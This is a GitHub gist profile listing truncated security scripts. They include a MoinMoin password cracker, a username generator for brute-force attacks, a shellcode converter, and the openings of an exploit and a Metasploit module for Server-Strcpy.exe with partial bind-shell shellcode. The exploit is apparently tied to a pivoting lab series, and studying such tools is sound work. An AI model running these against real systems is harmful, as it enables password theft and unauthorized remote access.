Skip to content

Instantly share code, notes, and snippets.

View superkojiman's full-sized avatar

superkojiman superkojiman

341 followers · 5 following
View GitHub Profile
@superkojiman
superkojiman / whereru
Last active December 2, 2021 16:17
Get location based on IP address.
#!/usr/bin/env python
import getopt
import urllib
import socket
def usage(name):
print 'Usage: %s -i IP' % name
print 'Usage: %s -h hostname' % name
def main(argv=sys.argv):
@superkojiman
superkojiman / getgenre
Created April 16, 2014 20:09
Get band's musical genre from Wikipedia
#!/usr/bin/env python
import sys
import plistlib
import urllib2
import re
GENRE_LINE = '<a href="http://www.blogger.com/wiki/Music_genre" title="Music genre">Genres</a>\n'
URL_PREFIX = 'http://en.wikipedia.org/wiki/Special:Search/'
artist_genre = {}
@superkojiman
superkojiman / moincrack.py
Created April 19, 2014 03:45
Crack MoinMoin Wiki passwords
#!/usr/bin/env python -Wignore::DeprecationWarning
import sha, base64, traceback, sys
if len(sys.argv) < 3:
print "usage: %s [user_password_list] [wordlist]" % (sys.argv[0])
sys.exit(0)
try:
for line in open(sys.argv[1], "r"):
a = line.strip().split(":")
@superkojiman
superkojiman / namemash.py
Last active December 20, 2025 11:41
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@superkojiman
superkojiman / bin2sc.py
Created April 22, 2014 03:15
Convert bin to shellcode.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
if len(sys.argv) < 2:
print "usage: %s file.bin\n" % (sys.argv[0],)
sys.exit(0)
shellcode = "\""
ctr = 1
maxlen = 15
@superkojiman
superkojiman / keybase.md
Last active June 1, 2024 16:14

Keybase proof

I hereby claim:

  • I am superkojiman on github.
  • I am superkojiman (https://keybase.io/superkojiman) on keybase.
  • I have a public key ASByWRYpDv1SBppt6tEbHXoMuIsNfMUaa2R6Co4tPLpuLgo

To claim this, I am signing this object:

@superkojiman
superkojiman / README.md
Last active June 27, 2022 13:03
64-bit binaries for ROP Primer

This repository contains the binaries used in my 64-bit ROP Primer writeup.

@superkojiman
superkojiman / soocat.sh
Created June 10, 2016 15:51
Quick function to run a binary under socat
# Add to .bashrc
# You're welcome
function soocat {
socat tcp-l:${2},reuseaddr,fork EXEC:${1}
}
@superkojiman
superkojiman / serverstrcpy.py
Created October 31, 2016 03:37
Exploit for Server-Strcpy.exe in the Introduction to Pivoting series.
#!/usr/bin/env python
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
import socket, sys
def main(target, port):
# 368 bytes, opens a bind TCP shell on port 4444
shellcode = (
"\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" +
@superkojiman
superkojiman / serverstrcpy.rb
Created October 31, 2016 03:40
Metasploit module for Server-Strcpy.exe in the Introduction to Pivoting series
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp